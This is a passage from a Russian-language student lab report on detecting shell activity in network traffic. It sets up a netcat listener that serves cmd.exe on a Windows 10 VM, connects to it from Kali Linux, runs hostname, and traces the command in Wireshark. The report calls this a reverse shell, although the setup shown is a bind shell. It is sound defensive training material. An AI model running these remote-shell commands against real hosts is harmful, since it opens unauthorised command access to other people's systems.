Осуществление Revers Shell, выполнение команды и поиск активности Revers Shell в пакетах трафика
На ВМ
с ОС Windows 10 запустим командную строку и
введём команду ncat -nlvp 4444 -e cmd.exe, где n –
опция для отключения DNS, l – опция для
начала прослушивания, v – опция для
режима вывода информации о процессе
работы программы, p – опция для указания
номера порта прослушивания.
Рисунок
34 – Настройка NetCat на прослушивание на
ВМ с ОС Windows 10
Подключимся
к этому порту с ВМ с Kali Linux с помощью
команды nc -nv 192.168.1.10 4444
Рисунок
35 – Подключение к ВМ с ОС Windows
10 с помощью NetCat
После
установления соединения на ВМ с ОС
Windows
10 запустится командная оболочка cmd.exe
Рисунок
36 – Запуск командной оболочки
cmd.exe
Выполним
команду hostname
на ВМ с ОС Kali
linux
Рисунок
37 – Выполнение команды hostname
на ВМ с ОС Kali
linux
На ВМ
с ОС Windows 10 запустим программу WireShark,
находим один пакет, нажимаем ПКМ по
нему, переходим по пути «Отслеживать →
TCP
поток» и фиксируем выполненную
команду hostname
Рисунок
38 – Фиксация Revers Shell в трафике
Вывод
В результате
выполнения данной лабораторной работы
были получены практические навыки
мониторинга и анализа сетевого трафика
для обнаружения потенциальных угроз
безопасности и вторжений.
13